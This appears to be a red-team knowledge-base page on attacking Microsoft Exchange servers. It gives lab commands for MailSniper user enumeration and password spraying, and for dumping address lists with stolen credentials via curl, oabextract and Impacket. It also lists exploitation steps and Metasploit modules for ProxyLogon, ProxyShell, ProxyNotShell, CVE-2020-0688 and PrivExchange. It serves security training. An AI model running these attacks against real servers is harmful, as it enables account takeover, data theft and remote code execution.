Malleum Knowledge Base

Attacking Exchange Servers

5 min read

Attacking Exchange Servers Book

Remote Access Protocols

  • Exchange Web Services (EWS)
  • Exchange ActiveSync (EAS)
  • Outlook Anywhere
  • MAPI over HTTP

AutoDiscover Service

  • Retrieves Exchange configuration
  • Mailbox settings
  • Supported protocols
  • Service URLs
  • Associated with autodiscover.xml in the autodiscover virtual directory

Outlook Web Application (OWA)

  • Web-based email client
  • Accessible with a browser
  • No Outlook installation required

Global Address List (GAL)

  • List of every mail-enabled object in an Active Directory forest

Outlook Features

Rules

  • Automated actions for incoming/outgoing emails
  • Trigger and action creation
  • Server-side and client-side execution

Forms

  • Email customization options
  • Autocompletion of fields
  • Template text

Security Threats

  • User enumeration
  • Password spraying
  • Email address extraction from GAL, Offline Address Book (OAB), or using NSPI
  • Public point-and-click exploits
  • Data exfiltration
  • Exploitation through client software

User Enumeration & Password Spraying

  1. hunter.io
  2. Mailsniper(https://github.com/dafthack/MailSniper)
  3. OABURL (https://gist.github.com/snovvcrash/4e76aaf2a8750922f546eed81aa51438#file-oaburl-py)

Mailsniper

  • we need to find out the domain name with the help of the DomainHarvestOWA function from MailSniper.

  • It has two options on how to obtain the correct domain name.

Finding Domain name with Mailsniper
Invoke-DomainHarvestOWA -ExchHostname $IP
User enumeration with Mailsniper
Invoke-UsernameHarvestOWA -UserList .\user.txt -ExchHostname $IP -Domain windomain.local -OutFile found.txt
Password Spray with Mailsniper
Invoke-PasswordSprayOWA -ExchHostname $IP -UserList .\found.txt -Password Qwerty123! -OutFile creds.txt

Dumping and Exfiltration

GAL Extraction using MailSniper from Compromised Account

Get-GlobalAddressList -ExchHostname 192.168.56.106 -UserName windomain.local\vinegrep -Password Qwerty123! -OutFile gal.txt

GAL email extraction using OAB

  1. Issue the web request to the autodiscover endpoint to retrieve autodiscover.xml.
  2. Search for the OABUrl value in the response, which is a path to the directory with OAB files. Do not miss other useful information, such as the domain user’s SID and domain controller name.
  3. Request oab.xml by using the OABUrl value to list OAB filenames.
  4. In oab.xml, search for a filename that includes data and has the **.**lzx extension.
  5. Download this file and parse it.
python3 oaburl.py windomain.local/vinegrep:'Qwerty123!'@192.168.56.106 -e 'vinegrep@windomain.local'

Next, we will copy the oab.xml file and parse it to find the URL for the .lzx file with the word data in the filename. This is our GAL OAB file. As a last step, we will save the file and parse through it to find email addresses:

curl -k --ntlm -u 'windomain.local\vinegrep:Qwerty123!' https://exchange.windomain.local/OAB/e79472bb-2dd6-4ffb-9e02-8dd42510bb1b/oab.xml > oab.xml

cat oab.xml | grep '.lzx' | grep data


curl -k --ntlm -u 'windomain.local\vinegrep:Qwerty123!' https://exchange.windomain.local/OAB/e79472bb-2dd6-4ffb-9e02-8dd42510bb1b/007215f1-4ab8-4ed2-a503-4cd82b0d8093-data-1.lzx > oab.lzx


./oabextract oab.lzx oab.txt


strings oab.txt | egrep -o "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,5}" | sort -u

Email extraction use NSPI (IMPACKET)

python3 exchanger.py windomain.local/vinegrep:'Qwerty123!'@exchange.windomain.local -debug nspi list-tables -count


python3 exchanger.py windomain.local/vinegrep:'Qwerty123!'@exchange.windomain.local -debug nspi dump-tables -guid 715d9794-704c-4fe3-a038-24f149747b2c -lookup-type EXTENDED

Detailed Public Exploits Information

CVE-2021-26855 (ProxyLogon)

  • Description: Server-Side Request Forgery (SSRF) vulnerability in Microsoft Exchange Server allows bypassing authentication.
  • Requirements: Vulnerable Microsoft Exchange Server, network access to the server.
  • Vulnerability Checking Tool: Nmap script exchange-proxylogon.nse.
  • Command to Check Vulnerability: nmap --script exchange-proxylogon.nse -p 443 [Exchange Server IP]
  • Impact: Unauthenticated attackers can send arbitrary HTTP requests as the Exchange Server.
  • Exploitation Scenario:
    • Accessing emails (requires at least two Exchange servers).
    • Authenticating to Exchange Control Panel (ECP) to upload a web shell.
  • Steps for Exploitation:
    1. Check vulnerability using the Nmap script.
    2. Use Metasploit module auxiliary/scanner/http/exchange_proxylogon for scanning.
    3. Exploit using Metasploit: exploit/windows/http/exchange_proxylogon_rce.

CVE-2021-27065

  • Description: Post-authentication arbitrary file write in Microsoft Exchange Server.
  • Requirements: Access to authenticated session in ECP.
  • Vulnerability Checking Tool: Manual check via Exchange Control Panel.
  • Impact: Authenticated attackers can write files to any path on the server.
  • Exploitation Scenario: Logging into ECP and exploiting the OAB virtual directory.
  • Steps for Exploitation:
    1. Gain access to an authenticated session in ECP.
    2. Navigate to the OAB virtual directory.
    3. Edit the External URL to insert web shell code.

ProxyOracle (CVE-2021-31195 & CVE-2021-31196)

  • Description: Reflected XSS and Padding Oracle Attack on Exchange Cookies.
  • Requirements: Access to the Exchange web interface.
  • Vulnerability Checking Tool: Browser-based testing.
  • Impact: Recovery of plaintext username and password from Exchange cookies.
  • Exploitation Scenario: Reflected XSS attack via crafted URL.
  • Steps for Exploitation:
    1. Craft a URL with an XSS payload targeting the Exchange Server.
    2. Observe the response for a popup alert confirming vulnerability.

ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207)

  • Description: Unauthenticated RCE via a series of vulnerabilities.
  • Requirements: Vulnerable Microsoft Exchange Server.
  • Vulnerability Checking Tool: Metasploit’s scanner module.
  • Command to Check Vulnerability: Use Metasploit’s relevant scanning module.
  • Impact: Execution of arbitrary code without authentication.
  • Exploitation Scenario: Faulty URL normalization and privilege escalation.
  • Steps for Exploitation:
    1. Use Metasploit for scanning: Relevant scanning module.
    2. Exploit using Metasploit: exploit/windows/http/exchange_proxyshell_rce.

ProxyNotShell (CVE-2022–41040 & CVE-2022–41082)

  • Description: SSRF and RCE via PowerShell, requiring authentication.
  • Requirements: Authenticated access to Exchange Server, especially Exchange 2019.
  • Vulnerability Checking Tool: Manual check or custom scripts.
  • Impact: Authenticated RCE via PowerShell.
  • Exploitation Scenario: Exploiting SSRF for authenticated RCE.
  • Steps for Exploitation:
    1. Authenticate to the Exchange server.
    2. Use Metasploit for Exchange 2019: exploit/windows/http/exchange_proxynotshell_rce.

CVE-2020-0688

  • Description: Arbitrary code execution due to fixed cryptographic keys in ECP.
  • Requirements: Authenticated session in ECP.
  • Vulnerability Checking Tool: ysoserial.net tool for payload generation.
  • Impact: Execution of arbitrary code by authenticated attackers.
  • Exploitation Scenario: ViewState deserialization in ECP.
  • Steps for Exploitation:
    1. Log into ECP and collect ViewStateUserKey and __VIEWSTATEGENERATOR.
    2. Use ysoserial.net to generate a malicious payload.
    3. Execute the payload targeting the ECP.

PrivExchange (CVE-2018-8581)

  • Description: Privilege escalation vulnerability in Microsoft Exchange Server.
  • Requirements: Exchange Server with improper NTLM settings, network access.
  • Vulnerability Checking Tool: Custom scripts or manual testing.
  • Impact: Attacker can gain DCSync rights in a domain.
  • Exploitation Scenario: NTLM relay attack.
  • Steps for Exploitation:
    1. Set up privexchange.py targeting the Exchange Server.
    2. Use ntlmrelayx.py targeting a domain controller to escalate privileges.

Exchnage Server

Graph View

Backlinks